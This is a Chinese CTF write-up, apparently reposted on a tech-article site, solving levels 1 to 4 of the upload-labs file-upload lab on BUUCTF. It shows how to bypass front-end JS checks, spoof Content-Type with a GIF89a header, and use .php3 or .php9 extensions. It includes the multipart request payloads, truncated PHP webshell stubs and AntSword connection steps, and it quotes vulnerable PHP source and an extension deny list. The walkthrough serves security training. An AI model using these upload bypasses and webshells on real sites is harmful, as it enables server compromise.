IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> BUUCTF--练习场-- basic--上传文件漏洞经典靶场upload-labs-- Pass1-3(Pass4简单尝试) -> 正文阅读

[PHP知识库]BUUCTF--练习场-- basic--上传文件漏洞经典靶场upload-labs-- Pass1-3(Pass4简单尝试)

文件上传功能非常常见,上传图片、视频,论坛发送带上附件,邮件发送带上附件等场景
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

BUUCTF–练习场-- basic–上传文件漏洞经典靶场upload-labs

在这里插入图片描述

在这里插入图片描述

Pass-1

在这里插入图片描述
先尝试上传一张正常的照片:

上传成功:
在这里插入图片描述

右键,查看图像,得到上传成功的地址:
http://07b2a810-8fe2-406b-b1d0-6bce30a755ae.node4.buuoj.cn:81/upload/Chrysanthemum.jpg
然后尝试上传木马:
根据简介中提到的:

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。

所以上传PHP的免杀一句话木马:
点击“上传”,竟然提示:

该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php

尝试开启burp进行抓包:
发现burp什么包都没有抓到,依旧弹出:

该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php

判断,这是前端的检验
看javascript源码:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

允许上传的文件类型是:.jpg|.png|.gif
所以上传PHP木马会失败

解决:绕过前端(非常简单)
找到触发校验的地方:
在这里插入图片描述
删去改JS方法,然后访问:
在这里插入图片描述
校验,发现成功获取webshell:
在这里插入图片描述
通过蚁剑连接:
在这里插入图片描述
在这里插入图片描述

再看Pass-2

在这里插入图片描述

直接上手—传木马:
跟刚才的提示不一样,这一次不是弹窗:
在这里插入图片描述
估计走的后端校验,尝试抓包:
果然:
在这里插入图片描述
cmd+r,给Repeater:
直接go一下,果然是:

<div id="msg">
                提示:文件类型不正确,请重新上传!            </div>
            <div id="img">
                            </div>

修改content- type,并加上图片头:

Content-Type: image/jpeg

GIF89a

<?php ......

(为了防止和第一题的有不同,修改为sqzr2.php)

Go一下:
成功上传:
在这里插入图片描述
直接根目录加上/upload/sqzr2.php 访问:
在这里插入图片描述
在这里插入图片描述

连接蚁剑:
在这里插入图片描述

在这里插入图片描述

回顾,看看源码:(PHP,后端检验)

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

其实就是检验的content- type,也没有检验上传文件的后缀。

Pass-3:

在这里插入图片描述

先尝试上传木马:
在这里插入图片描述
burp抓包改后缀:

Content-Disposition: form-data; name="upload_file"; filename="sqzr3.php3"
Content-Type: application/octet-stream

GIF89a
<?php 

go一下成功:
在这里插入图片描述

放包直接访问:

http://07b2a810-8fe2-406b-b1d0-6bce30a755ae.node4.buuoj.cn:81/upload/202201290656555488.php3

成功:
在这里插入图片描述
在这里插入图片描述
连接蚁剑:
在这里插入图片描述
在这里插入图片描述
回顾,看一下关键的源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Pass-4

先尝试上传一个木马,
在这里插入图片描述

在这里插入图片描述
只是提示 此文件不允许上传 也没有别的提示,尝试抓包,改

Content-Disposition: form-data; name="upload_file"; filename="sqzr.php3"
Content-Type: image/jpeg

GIF89a
<?php 

Go了,还是不允许上传,看一波提示:


提 示

本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!

试试PHP9:

Content-Disposition: form-data; name="upload_file"; filename="sqzr4.php9"
Content-Type: image/jpeg

GIF89a
<?php 

居然成功:
在这里插入图片描述
访问:

http://07b2a810-8fe2-406b-b1d0-6bce30a755ae.node4.buuoj.cn:81/upload/sqzr4.php9

在这里插入图片描述

如果直接连接蚁剑,发现不行,又遇到问题了

最后尝试利用 .htaccess文件解决:
在这里插入图片描述
在这里插入图片描述

先上传这个.htaccess文件:
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-04 10:50:50  更:2022-02-04 10:51:18 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 5:44:18-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计